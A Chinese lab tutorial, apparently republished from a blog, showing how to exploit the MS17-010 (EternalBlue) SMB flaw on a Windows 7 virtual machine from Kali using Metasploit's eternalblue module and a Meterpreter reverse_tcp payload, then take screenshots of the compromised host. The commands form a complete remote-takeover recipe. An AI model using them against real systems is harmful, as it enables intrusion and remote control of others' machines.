admin 管理员组

文章数量: 887017

利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)

1.实验环境

  虚拟机里面配置 kali 和 win7 在同一网段下,这里我设置的10.10.10.0/24:
  Kali linux  2019(10.10.10.131)
  Windows 7 X64 (10.10.10.130)
       环境链接:[密码 :b79j](https://pan.baidu/s/1JcYgJ8SgiwUXoIZhgakSnw)

2.漏洞介绍

  Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

3.攻击过程

1.ping 命令连通性测试


可以ping通,如果ping 130 不通,看下win7 是不是开了防火墙

2. Kali 攻击步骤
1.攻击模块 msf : msfconsole

2.利用模块查询 search ms17_010


利用针对 win 7 的模块: use exploit/windows/smb/ms17_010_eternalblue
3.攻击参数配置
主要配置 :
攻击目标 :set rhosts 10.10.10.130
执行攻击:exploit


开始攻击得到shell !攻击成功


4.另一种方式:设置Meterpreter payload后在进行攻击

 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,此模块包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。


只需要比上一步多一条配置:set payload windows/x64/meterpreter/reverse_tcp

执行成功:

阔以进行各种有意思的操作了:screenshot 屏幕截图等

get 屏幕截图:

5.Tips
如果执行不成功,可以尝试 修改下端口在尝试

set slport 22254[随便设置不常用的端口]

本文标签: 漏洞 过程 MSF Metasploit Windows

版权声明:本文标题:利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝) 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1728028880h1189747.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。